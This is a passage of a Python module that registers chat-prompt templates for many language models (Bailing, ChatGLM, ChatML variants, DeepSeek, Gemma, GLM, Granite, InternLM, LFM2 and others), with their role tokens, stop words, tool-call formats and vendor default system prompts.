    format_assistant=StringFormatter(slots=["{{content}}", {"eos_token"}, "\n\n"]),
    default_system=(
        "Below is an instruction that describes a task. Write a response that appropriately completes the request.\n\n"
    ),
    replace_jinja_template=True,
)
# Bailing v1 role-tag template.
# Edge case: efficient_eos=True — no explicit eos slot in the assistant turn; generation
# stops on "<|endoftext|>". efficient_eos templates reject `train_on_prompt`
# (see get_template_and_fix_tokenizer).
register_template(
    name="bailing",
    format_user=StringFormatter(slots=["<role>HUMAN</role>{{content}}<role>ASSISTANT</role>"]),
    format_system=StringFormatter(slots=["<role>SYSTEM</role>{{content}}"]),
    format_observation=StringFormatter(slots=["<role>OBSERVATION</role>{{content}}<role>ASSISTANT</role>"]),
    stop_words=["<|endoftext|>"],
    efficient_eos=True,
)
# Bailing v2 adds <|role_end|> turn terminators and Ling-format tool calling.
# Edge case: tool results are wrapped in <tool_response> tags inside the OBSERVATION role.
register_template(
    name="bailing_v2",
    format_user=StringFormatter(slots=["<role>HUMAN</role>{{content}}<|role_end|><role>ASSISTANT</role>"]),
    format_system=StringFormatter(slots=["<role>SYSTEM</role>{{content}}<|role_end|>"]),
    format_assistant=StringFormatter(slots=["{{content}}<|role_end|>"]),
    format_observation=StringFormatter(
        slots=[
            "<role>OBSERVATION</role>\n<tool_response>\n{{content}}\n</tool_response><|role_end|><role>ASSISTANT</role>"
        ]
    ),
    format_function=FunctionFormatter(slots=["{{content}}<|role_end|>"], tool_format="ling"),
    format_tools=ToolFormatter(tool_format="ling"),
    stop_words=["<|endoftext|>"],
    efficient_eos=True,
)
# Breeze: Llama2-style [INST] markup with a bos prefix.
# Edge case: trailing space after [/INST] is intentional and part of the prompt.
register_template(
    name="breeze",
    format_user=StringFormatter(slots=["[INST] {{content}} [/INST] "]),
    format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
    efficient_eos=True,
)
# ChatGLM3: roles are special TOKENS ({"token": ...}), not plain strings.
# Edge case: the prefix is the [gMASK]+sop token pair, and generation stops on the
# role tokens <|user|>/<|observation|> rather than an eos (efficient_eos=True).
register_template(
    name="chatglm3",
    format_user=StringFormatter(slots=[{"token": "<|user|>"}, "\n", "{{content}}", {"token": "<|assistant|>"}]),
    format_assistant=StringFormatter(slots=["\n", "{{content}}"]),
    format_system=StringFormatter(slots=[{"token": "<|system|>"}, "\n", "{{content}}"]),
    format_function=FunctionFormatter(slots=["{{content}}"], tool_format="glm4"),
    format_observation=StringFormatter(
        slots=[{"token": "<|observation|>"}, "\n", "{{content}}", {"token": "<|assistant|>"}]
    ),
    format_tools=ToolFormatter(tool_format="glm4"),
    format_prefix=EmptyFormatter(slots=[{"token": "[gMASK]"}, {"token": "sop"}]),
    stop_words=["<|user|>", "<|observation|>"],
    efficient_eos=True,
)
# Generic ChatML template.
# Edge case: BOTH <|im_end|> and <|im_start|> are stop words here, unlike most
# ChatML derivatives below which stop only on <|im_end|>.
register_template(
    name="chatml",
    format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
    format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
    format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
    format_observation=StringFormatter(slots=["<|im_start|>tool\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
    stop_words=["<|im_end|>", "<|im_start|>"],
    replace_eos=True,
    replace_jinja_template=True,
)
# copied from chatml template
# German-language variant: differs from chatml only in the default system message.
register_template(
    name="chatml_de",
    format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
    format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
    format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
    format_observation=StringFormatter(slots=["<|im_start|>tool\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
    default_system="Du bist ein freundlicher und hilfsbereiter KI-Assistent.",
    stop_words=["<|im_end|>", "<|im_start|>"],
    replace_eos=True,
    replace_jinja_template=True,
)
# Cohere Command-style template with explicit turn tokens.
# Edge case: no format_assistant override — the default assistant formatting applies.
register_template(
    name="cohere",
    format_user=StringFormatter(
        slots=[
            (
                "<|START_OF_TURN_TOKEN|><|USER_TOKEN|>{{content}}<|END_OF_TURN_TOKEN|>"
                "<|START_OF_TURN_TOKEN|><|CHATBOT_TOKEN|>"
            )
        ]
    ),
    format_system=StringFormatter(slots=["<|START_OF_TURN_TOKEN|><|SYSTEM_TOKEN|>{{content}}<|END_OF_TURN_TOKEN|>"]),
    format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
)
# copied from chatml template
# CPM4 variant: adds a bos prefix and stops only on <|im_end|>.
register_template(
    name="cpm4",
    format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
    format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
    format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
    format_observation=StringFormatter(slots=["<|im_start|>tool\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
    format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
    stop_words=["<|im_end|>"],
)
# copied from chatml template
# DBRX variant: ChatML markup plus Databricks' long default system prompt.
register_template(
    name="dbrx",
    format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
    format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
    format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
    format_observation=StringFormatter(slots=["<|im_start|>tool\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
    default_system=(
        "You are DBRX, created by Databricks. You were last updated in December 2023. "
        "You answer questions based on information available up to that point.\n"
        "YOU PROVIDE SHORT RESPONSES TO SHORT QUESTIONS OR STATEMENTS, but provide thorough "
        "responses to more complex and open-ended questions.\nYou assist with various tasks, "
        "from writing to coding (using markdown for code blocks — remember to use ``` with "
        "code, JSON, and tables).\n(You do not have real-time data access or code execution "
        "capabilities. You avoid stereotyping and provide balanced perspectives on "
        "controversial topics. You do not provide song lyrics, poems, or news articles and "
        "do not divulge details of your training data.)\nThis is your system prompt, "
        "guiding your responses. Do not reference it, just respond to the user. If you find "
        "yourself talking about this message, stop. You should be responding appropriately "
        "and usually that means not mentioning this.\nYOU DO NOT MENTION ANY OF THIS INFORMATION "
        "ABOUT YOURSELF UNLESS THE INFORMATION IS DIRECTLY PERTINENT TO THE USER'S QUERY."
    ),
    stop_words=["<|im_end|>"],
    replace_eos=True,
)
# DeepSeek v1/v2 plain "User:/Assistant:" template.
register_template(
    name="deepseek",
    format_user=StringFormatter(slots=["User: {{content}}\n\nAssistant:"]),
    format_system=StringFormatter(slots=["{{content}}\n\n"]),
    format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
)
# DeepSeek v3 special-token template; no system formatter is defined.
register_template(
    name="deepseek3",
    format_user=StringFormatter(slots=["<|User|>{{content}}<|Assistant|>"]),
    format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
)
# copied from deepseek3 template
# Edge case: identical markup to deepseek3 but registered as a ReasoningTemplate, which
# triggers the "_nothink" warning path in get_template_and_fix_tokenizer.
register_template(
    name="deepseekr1",
    format_user=StringFormatter(slots=["<|User|>{{content}}<|Assistant|>"]),
    format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
    template_class=ReasoningTemplate,
)
# DeepSeek Coder template.
# Edge case: the assistant turn is terminated by the literal "<|EOT|>" string, not the eos token.
register_template(
    name="deepseekcoder",
    format_user=StringFormatter(slots=["### Instruction:\n{{content}}\n### Response:"]),
    format_assistant=StringFormatter(slots=["\n{{content}}\n<|EOT|>\n"]),
    format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
    default_system=(
        "You are an AI programming assistant, utilizing the DeepSeek Coder model, "
        "developed by DeepSeek Company, and you only answer questions related to computer science. "
        "For politically sensitive questions, security and privacy issues, "
        "and other non-computer science questions, you will refuse to answer.\n"
    ),
)
# Fallback "Human:/Assistant:" template.
# Edge case: the eos_token appears INSIDE the user slot (after the user content),
# in addition to the assistant and system slots.
register_template(
    name="default",
    format_user=StringFormatter(slots=["Human: {{content}}", {"eos_token"}, "\nAssistant:"]),
    format_assistant=StringFormatter(slots=["{{content}}", {"eos_token"}, "\n"]),
    format_system=StringFormatter(slots=["System: {{content}}", {"eos_token"}, "\n"]),
    replace_jinja_template=True,
)
# dots.ocr template — reuses the qwen2_vl mm plugin with dots-specific vision tokens.
register_template(
    name="dots_ocr",
    format_user=StringFormatter(slots=["<|user|>{{content}}<|endofuser|><|assistant|>"]),
    format_assistant=StringFormatter(slots=["{{content}}<|endofassistant|>"]),
    format_system=StringFormatter(slots=["<|system|>{{content}}<|endofsystem|>\n"]),
    stop_words=["<|endofassistant|>"],
    efficient_eos=True,
    mm_plugin=get_mm_plugin(
        name="qwen2_vl",
        image_token="<|imgpad|>",
        video_token="<|vidpad|>",
        vision_bos_token="<|img|>",
        vision_eos_token="<|endofimg|>",
    ),
)
# Edge case: "empty" applies no markup at all; it is also used as the placeholder
# when `template` is unspecified and the tokenizer has no chat template.
register_template(
    name="empty",
    format_assistant=StringFormatter(slots=["{{content}}"]),
)
# copied from chatml template
# ERNIE thinking-mode variant: double newline after each <|im_end|>, and the default
# system message enables think_mode via a <global_setting> block.
register_template(
    name="ernie",
    format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n\n<|im_start|>assistant\n"]),
    format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n\n"]),
    format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n\n"]),
    format_observation=StringFormatter(slots=["<|im_start|>tool\n{{content}}<|im_end|>\n\n<|im_start|>assistant\n"]),
    default_system="<global_setting>\nthink_mode=True\n</global_setting>",
    stop_words=["<|im_end|>"],
)
# ERNIE non-thinking variant: plain "User:/Assistant:" markup with sentence-boundary tokens.
register_template(
    name="ernie_nothink",
    format_user=StringFormatter(slots=["User: {{content}}\nAssistant: "]),
    format_assistant=StringFormatter(slots=["{{content}}<|end_of_sentence|>"]),
    format_system=StringFormatter(slots=["{{content}}\n"]),
    format_prefix=EmptyFormatter(slots=["<|begin_of_sentence|>"]),
    stop_words=["<|end_of_sentence|>"],
)
# ERNIE vision-language reasoning template.
# Edge case: the "\nAssistant: " prompt lives in the ASSISTANT slot (not the user slot),
# and there is no bos prefix, unlike ernie_nothink.
register_template(
    name="ernie_vl",
    format_user=StringFormatter(slots=["User: {{content}}"]),
    format_assistant=StringFormatter(slots=["\nAssistant: {{content}}<|end_of_sentence|>"]),
    format_system=StringFormatter(slots=["{{content}}\n"]),
    stop_words=["<|end_of_sentence|>"],
    replace_eos=True,
    replace_jinja_template=True,
    template_class=ReasoningTemplate,
    mm_plugin=get_mm_plugin(name="ernie_vl", image_token="<|IMAGE_PLACEHOLDER|>", video_token="<|VIDEO_PLACEHOLDER|>"),
)
# EXAONE template.
# Edge case: the system turn ends with the literal "[|endofturn|]" while the assistant
# turn ends with the tokenizer's eos_token.
register_template(
    name="exaone",
    format_user=StringFormatter(slots=["[|user|]{{content}}\n[|assistant|]"]),
    format_assistant=StringFormatter(slots=["{{content}}", {"eos_token"}, "\n"]),
    format_system=StringFormatter(slots=["[|system|]{{content}}[|endofturn|]\n"]),
)
# Falcon template: no system formatter, no stop words; relies on efficient_eos.
register_template(
    name="falcon",
    format_user=StringFormatter(slots=["User: {{content}}\nFalcon:"]),
    format_assistant=StringFormatter(slots=["{{content}}\n"]),
    efficient_eos=True,
)
# copied from chatml template
# Falcon-H1: ChatML markup with bos prefix; also stops on <|end_of_text|>.
register_template(
    name="falcon_h1",
    format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
    format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
    format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
    format_observation=StringFormatter(slots=["<|im_start|>tool\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
    format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
    stop_words=["<|im_end|>", "<|end_of_text|>"],
)
# Few-shot evaluation template.
# Edge case: there is no user formatter at all — only assistant turns separated by
# blank lines, as expected for n-shot prompt concatenation.
register_template(
    name="fewshot",
    format_assistant=StringFormatter(slots=["{{content}}\n\n"]),
    efficient_eos=True,
    replace_jinja_template=True,
)
# Gemma template (uses Llama2Template class — system message is merged into the first turn
# by that class, per the llama2 registrations below which share it).
register_template(
    name="gemma",
    format_user=StringFormatter(slots=["<start_of_turn>user\n{{content}}<end_of_turn>\n<start_of_turn>model\n"]),
    format_assistant=StringFormatter(slots=["{{content}}<end_of_turn>\n"]),
    format_system=StringFormatter(slots=["{{content}}\n\n"]),
    format_observation=StringFormatter(
        slots=["<start_of_turn>tool\n{{content}}<end_of_turn>\n<start_of_turn>model\n"]
    ),
    format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
    stop_words=["<end_of_turn>"],
    replace_eos=True,
    template_class=Llama2Template,
)
# copied from gemma template
# Gemma 2: differs from gemma by stopping on <eos> as well, and using efficient_eos
# instead of replace_eos.
register_template(
    name="gemma2",
    format_user=StringFormatter(slots=["<start_of_turn>user\n{{content}}<end_of_turn>\n<start_of_turn>model\n"]),
    format_assistant=StringFormatter(slots=["{{content}}<end_of_turn>\n"]),
    format_system=StringFormatter(slots=["{{content}}\n\n"]),
    format_observation=StringFormatter(
        slots=["<start_of_turn>tool\n{{content}}<end_of_turn>\n<start_of_turn>model\n"]
    ),
    format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
    stop_words=["<eos>", "<end_of_turn>"],
    efficient_eos=True,
    template_class=Llama2Template,
)
# copied from gemma template
# Gemma 3: same markup as gemma plus the gemma3 multimodal plugin.
register_template(
    name="gemma3",
    format_user=StringFormatter(slots=["<start_of_turn>user\n{{content}}<end_of_turn>\n<start_of_turn>model\n"]),
    format_assistant=StringFormatter(slots=["{{content}}<end_of_turn>\n"]),
    format_system=StringFormatter(slots=["{{content}}\n\n"]),
    format_observation=StringFormatter(
        slots=["<start_of_turn>tool\n{{content}}<end_of_turn>\n<start_of_turn>model\n"]
    ),
    format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
    stop_words=["<end_of_turn>"],
    replace_eos=True,
    mm_plugin=get_mm_plugin("gemma3", image_token="<image_soft_token>"),
    template_class=Llama2Template,
)
# Gemma 3n: like gemma3 but the plugin additionally handles audio tokens.
register_template(
    name="gemma3n",
    format_user=StringFormatter(slots=["<start_of_turn>user\n{{content}}<end_of_turn>\n<start_of_turn>model\n"]),
    format_assistant=StringFormatter(slots=["{{content}}<end_of_turn>\n"]),
    format_system=StringFormatter(slots=["{{content}}\n\n"]),
    format_observation=StringFormatter(
        slots=["<start_of_turn>tool\n{{content}}<end_of_turn>\n<start_of_turn>model\n"]
    ),
    format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
    stop_words=["<end_of_turn>"],
    replace_eos=True,
    mm_plugin=get_mm_plugin("gemma3n", image_token="<image_soft_token>", audio_token="<audio_soft_token>"),
    template_class=Llama2Template,
)
# GLM-4 template.
# Edge case: generation stops on the role markers <|user|>/<|observation|> rather than
# an eos token (efficient_eos=True), and the prefix is the literal "[gMASK]<sop>" string.
register_template(
    name="glm4",
    format_user=StringFormatter(slots=["<|user|>\n{{content}}<|assistant|>"]),
    format_assistant=StringFormatter(slots=["\n{{content}}"]),
    format_system=StringFormatter(slots=["<|system|>\n{{content}}"]),
    format_function=FunctionFormatter(slots=["{{content}}"], tool_format="glm4"),
    format_observation=StringFormatter(slots=["<|observation|>\n{{content}}<|assistant|>"]),
    format_tools=ToolFormatter(tool_format="glm4"),
    format_prefix=EmptyFormatter(slots=["[gMASK]<sop>"]),
    stop_words=["<|user|>", "<|observation|>"],
    efficient_eos=True,
)
# copied from glm4 template
# GLM-4 MoE: same markup but glm4_moe tool format and reasoning-template behavior.
register_template(
    name="glm4_moe",
    format_user=StringFormatter(slots=["<|user|>\n{{content}}<|assistant|>"]),
    format_assistant=StringFormatter(slots=["\n{{content}}"]),
    format_system=StringFormatter(slots=["<|system|>\n{{content}}"]),
    format_function=FunctionFormatter(slots=["{{content}}"], tool_format="glm4_moe"),
    format_observation=StringFormatter(slots=["<|observation|>\n{{content}}<|assistant|>"]),
    format_tools=ToolFormatter(tool_format="glm4_moe"),
    format_prefix=EmptyFormatter(slots=["[gMASK]<sop>"]),
    stop_words=["<|user|>", "<|observation|>"],
    efficient_eos=True,
    template_class=ReasoningTemplate,
)
# copied from glm4 template
# GLM-4V: adds the multimodal plugin and "</answer>" as an extra stop word.
register_template(
    name="glm4v",
    format_user=StringFormatter(slots=["<|user|>\n{{content}}<|assistant|>"]),
    format_assistant=StringFormatter(slots=["\n{{content}}"]),
    format_system=StringFormatter(slots=["<|system|>\n{{content}}"]),
    format_function=FunctionFormatter(slots=["{{content}}"], tool_format="glm4"),
    format_observation=StringFormatter(slots=["<|observation|>\n{{content}}<|assistant|>"]),
    format_tools=ToolFormatter(tool_format="glm4"),
    format_prefix=EmptyFormatter(slots=["[gMASK]<sop>"]),
    stop_words=["<|user|>", "<|observation|>", "</answer>"],
    efficient_eos=True,
    mm_plugin=get_mm_plugin(name="glm4v", image_token="<|image|>", video_token="<|video|>"),
    template_class=ReasoningTemplate,
)
# copied from glm4 template
# GLM-4.5V: glm4v markup with the glm4_moe tool format.
register_template(
    name="glm4_5v",
    format_user=StringFormatter(slots=["<|user|>\n{{content}}<|assistant|>"]),
    format_assistant=StringFormatter(slots=["\n{{content}}"]),
    format_system=StringFormatter(slots=["<|system|>\n{{content}}"]),
    format_function=FunctionFormatter(slots=["{{content}}"], tool_format="glm4_moe"),
    format_observation=StringFormatter(slots=["<|observation|>\n{{content}}<|assistant|>"]),
    format_tools=ToolFormatter(tool_format="glm4_moe"),
    format_prefix=EmptyFormatter(slots=["[gMASK]<sop>"]),
    stop_words=["<|user|>", "<|observation|>", "</answer>"],
    efficient_eos=True,
    mm_plugin=get_mm_plugin(name="glm4v", image_token="<|image|>", video_token="<|video|>"),
    template_class=ReasoningTemplate,
)
# copied from glm4 template
# GLM OCR: glm4v markup without the reasoning template class.
register_template(
    name="glm_ocr",
    format_user=StringFormatter(slots=["<|user|>\n{{content}}<|assistant|>"]),
    format_assistant=StringFormatter(slots=["\n{{content}}"]),
    format_system=StringFormatter(slots=["<|system|>\n{{content}}"]),
    format_function=FunctionFormatter(slots=["{{content}}"], tool_format="glm4"),
    format_observation=StringFormatter(slots=["<|observation|>\n{{content}}<|assistant|>"]),
    format_tools=ToolFormatter(tool_format="glm4"),
    format_prefix=EmptyFormatter(slots=["[gMASK]<sop>"]),
    stop_words=["<|user|>", "<|observation|>"],
    efficient_eos=True,
    mm_plugin=get_mm_plugin(name="glm4v", image_token="<|image|>", video_token="<|video|>"),
)
# copied from glm4_moe template
# GLM-4.7: sets explicit <think> thought markers and a dedicated reasoning template class.
register_template(
    name="glm4_7",
    format_user=StringFormatter(slots=["<|user|>\n{{content}}<|assistant|>"]),
    format_assistant=StringFormatter(slots=["\n{{content}}"]),
    format_system=StringFormatter(slots=["<|system|>\n{{content}}"]),
    format_function=FunctionFormatter(slots=["{{content}}"], tool_format="glm4_moe"),
    format_observation=StringFormatter(slots=["<|observation|>\n{{content}}<|assistant|>"]),
    format_tools=ToolFormatter(tool_format="glm4_moe"),
    format_prefix=EmptyFormatter(slots=["[gMASK]<sop>"]),
    stop_words=["<|user|>", "<|observation|>"],
    thought_words=("<think>", "</think>"),
    efficient_eos=True,
    template_class=Glm47ReasoningTemplate,
)
# copied from glm4 template
# GLM-Z1: glm4 markup registered as a ReasoningTemplate.
register_template(
    name="glmz1",
    format_user=StringFormatter(slots=["<|user|>\n{{content}}<|assistant|>"]),
    format_assistant=StringFormatter(slots=["\n{{content}}"]),
    format_system=StringFormatter(slots=["<|system|>\n{{content}}"]),
    format_function=FunctionFormatter(slots=["{{content}}"], tool_format="glm4"),
    format_observation=StringFormatter(slots=["<|observation|>\n{{content}}<|assistant|>"]),
    format_tools=ToolFormatter(tool_format="glm4"),
    format_prefix=EmptyFormatter(slots=["[gMASK]<sop>"]),
    stop_words=["<|user|>", "<|observation|>"],
    efficient_eos=True,
    template_class=ReasoningTemplate,
)
# GPT-OSS harmony-style template.
# Edge case: the thought markers are full channel headers — the closing marker itself
# re-opens the assistant's "final" channel, so the visible answer follows it directly.
register_template(
    name="gpt_oss",
    format_user=StringFormatter(slots=["<|start|>user<|message|>{{content}}<|end|><|start|>assistant"]),
    format_assistant=StringFormatter(slots=["{{content}}"]),
    format_system=StringFormatter(slots=["<|start|>system<|message|>{{content}}<|end|>"]),
    default_system="You are ChatGPT, a large language model trained by OpenAI.",
    thought_words=("<|channel|>analysis<|message|>", "<|end|><|start|>assistant<|channel|>final<|message|>"),
    efficient_eos=True,
    template_class=ReasoningTemplate,
)
# Granite 3 role-token template; no stop words or tool formatters are registered.
register_template(
    name="granite3",
    format_user=StringFormatter(
        slots=[
            "<|start_of_role|>user<|end_of_role|>{{content}}<|end_of_text|>\n<|start_of_role|>assistant<|end_of_role|>"
        ]
    ),
    format_assistant=StringFormatter(slots=["{{content}}<|end_of_text|>\n"]),
    format_system=StringFormatter(slots=["<|start_of_role|>system<|end_of_role|>{{content}}<|end_of_text|>\n"]),
)
# Granite 3 vision variant: different (llava-style) role markup and the llava_next plugin.
register_template(
    name="granite3_vision",
    format_user=StringFormatter(slots=["<|user|>\n{{content}}\n<|assistant|>\n"]),
    format_system=StringFormatter(slots=["<|system|>\n{{content}}\n"]),
    default_system=(
        "A chat between a curious user and an artificial intelligence assistant. "
        "The assistant gives helpful, detailed, and polite answers to the user's questions."
    ),
    mm_plugin=get_mm_plugin(name="llava_next", image_token="<image>"),
)
# Granite 4 template: granite3 markup plus default tool-calling formatters.
# Edge case: after a tool observation the assistant prompt must be re-opened with the
# same "<|start_of_role|>assistant<|end_of_role|>" marker used in format_user.
register_template(
    name="granite4",
    format_user=StringFormatter(
        slots=[
            "<|start_of_role|>user<|end_of_role|>{{content}}<|end_of_text|>\n<|start_of_role|>assistant<|end_of_role|>"
        ]
    ),
    format_assistant=StringFormatter(slots=["{{content}}<|end_of_text|>\n"]),
    format_system=StringFormatter(slots=["<|start_of_role|>system<|end_of_role|>{{content}}<|end_of_text|>\n"]),
    format_function=FunctionFormatter(slots=["{{content}}<|end_of_text|>\n"], tool_format="default"),
    # Fix: the observation slot previously ended with a bare "<|start_of_role|>assistant\n",
    # inconsistent with the "<|start_of_role|>assistant<|end_of_role|>" marker in format_user.
    format_observation=StringFormatter(
        slots=[
            "<|start_of_role|>tool<|end_of_role|>{{content}}<|end_of_text|>\n<|start_of_role|>assistant<|end_of_role|>"
        ]
    ),
    format_tools=ToolFormatter(tool_format="default"),
    stop_words=["<|end_of_text|>"],
    default_system="You are Granite, developed by IBM. You are a helpful AI assistant.",
)
# Index template: uses reserved tokens as role delimiters and <unk> before the system message.
register_template(
    name="index",
    format_user=StringFormatter(slots=["reserved_0{{content}}reserved_1"]),
    format_system=StringFormatter(slots=["<unk>{{content}}"]),
    efficient_eos=True,
)
# Hunyuan template: roles are marked by <|extra_*|> tokens; assistant ends with <|eos|>.
register_template(
    name="hunyuan",
    format_user=StringFormatter(slots=["{{content}}<|extra_0|>"]),
    format_assistant=StringFormatter(slots=["{{content}}<|eos|>"]),
    format_system=StringFormatter(slots=["{{content}}<|extra_4|>"]),
    format_prefix=EmptyFormatter(slots=["<|startoftext|>"]),
    stop_words=["<|eos|>"],
)
# Hunyuan small: placeholder tokens contain U+2581 (▁) characters — they must be
# copied verbatim; the assistant terminator doubles as the only stop word.
register_template(
    name="hunyuan_small",
    format_user=StringFormatter(slots=["<|hy_User|>{{content}}<|hy_place▁holder▁no▁8|>"]),
    format_assistant=StringFormatter(slots=["{{content}}<|hy_place▁holder▁no▁2|>"]),
    format_system=StringFormatter(slots=["{{content}}<|hy_place▁holder▁no▁3|>"]),
    format_prefix=EmptyFormatter(slots=["<|hy_begin▁of▁sentence|>"]),
    stop_words=["<|hy_place▁holder▁no▁2|>"],
)
# InternLM2: ChatML markup with a bos prefix and a bilingual default system message.
register_template(
    name="intern2",
    format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
    format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
    format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
    format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
    default_system=(
        "You are an AI assistant whose name is InternLM (书生·浦语).\n"
        "- InternLM (书生·浦语) is a conversational language model that is developed by Shanghai AI Laboratory "
        "(上海人工智能实验室). It is designed to be helpful, honest, and harmless.\n"
        "- InternLM (书生·浦语) can understand and communicate fluently in the language "
        "chosen by the user such as English and 中文."
    ),
    stop_words=["<|im_end|>"],
)
# InternVL: intern2 markup plus the intern_vl multimodal plugin.
register_template(
    name="intern_vl",
    format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
    format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
    format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
    format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
    default_system=(
        "你是书生·万象,英文名是InternVL,是由上海人工智能实验室、清华大学及多家合作单位联合开发的多模态大语言模型。"
    ),
    stop_words=["<|im_end|>"],
    mm_plugin=get_mm_plugin(name="intern_vl", image_token="<image>", video_token="<video>"),
)
# Intern-S1: intern_vl without a default system message.
register_template(
    name="intern_s1",
    format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
    format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
    format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
    format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
    stop_words=["<|im_end|>"],
    mm_plugin=get_mm_plugin(name="intern_vl", image_token="<image>", video_token="<video>"),
)
# copied from qwen template
# Keye-VL: qwen-style tool calling; tool results are sent as a USER turn wrapped
# in <tool_response> tags, not as a dedicated tool role.
register_template(
    name="keye_vl",
    format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
    format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
    format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
    format_function=FunctionFormatter(slots=["{{content}}<|im_end|>\n"], tool_format="qwen"),
    format_observation=StringFormatter(
        slots=["<|im_start|>user\n<tool_response>\n{{content}}\n</tool_response><|im_end|>\n<|im_start|>assistant\n"]
    ),
    format_tools=ToolFormatter(tool_format="qwen"),
    stop_words=["<|im_end|>"],
    replace_eos=True,
    mm_plugin=get_mm_plugin(name="qwen2_vl", image_token="<|image_pad|>", video_token="<|video_pad|>"),
    template_class=ReasoningTemplate,
)
# Kimi-VL reasoning template.
# Edge case: thought markers are the non-ASCII "◁think▷"/"◁/think▷" pair — copy verbatim.
register_template(
    name="kimi_vl",
    format_user=StringFormatter(
        slots=["<|im_user|>user<|im_middle|>{{content}}<|im_end|><|im_assistant|>assistant<|im_middle|>"]
    ),
    format_assistant=StringFormatter(slots=["{{content}}<|im_end|>"]),
    format_system=StringFormatter(slots=["<|im_system|>system<|im_middle|>{{content}}<|im_end|>"]),
    default_system="You are a helpful assistant",
    stop_words=["<|im_end|>"],
    thought_words=("◁think▷", "◁/think▷"),
    mm_plugin=get_mm_plugin("kimi_vl", image_token="<|media_pad|>"),
    template_class=ReasoningTemplate,
)
# LFM2: ChatML markup with dedicated tool-call and tool-response delimiter tokens.
register_template(
    name="lfm2",
    format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
    format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
    format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
    format_function=FunctionFormatter(slots=["{{content}}<|im_end|>\n"], tool_format="lfm2"),
    format_observation=StringFormatter(
        slots=[
            "<|im_start|>tool\n<|tool_response_start|>{{content}}<|tool_response_end|><|im_end|>\n"
            "<|im_start|>assistant\n"
        ]
    ),
    format_tools=ToolFormatter(tool_format="lfm2"),
    default_system="You are a helpful AI assistant.",
    stop_words=["<|im_end|>"],
    tool_call_words=("<|tool_call_start|>", "<|tool_call_end|>"),
    replace_eos=True,
)
# LFM2-VL: identical to lfm2 except for the default system message and the vision plugin.
register_template(
    name="lfm2_vl",
    format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
    format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
    format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
    format_function=FunctionFormatter(slots=["{{content}}<|im_end|>\n"], tool_format="lfm2"),
    format_observation=StringFormatter(
        slots=[
            "<|im_start|>tool\n<|tool_response_start|>{{content}}<|tool_response_end|><|im_end|>\n"
            "<|im_start|>assistant\n"
        ]
    ),
    format_tools=ToolFormatter(tool_format="lfm2"),
    default_system="You are a helpful multimodal assistant by Liquid AI.",
    stop_words=["<|im_end|>"],
    tool_call_words=("<|tool_call_start|>", "<|tool_call_end|>"),
    replace_eos=True,
    mm_plugin=get_mm_plugin(name="lfm2_vl", image_token="<image>"),
)
# Llama 2 template.
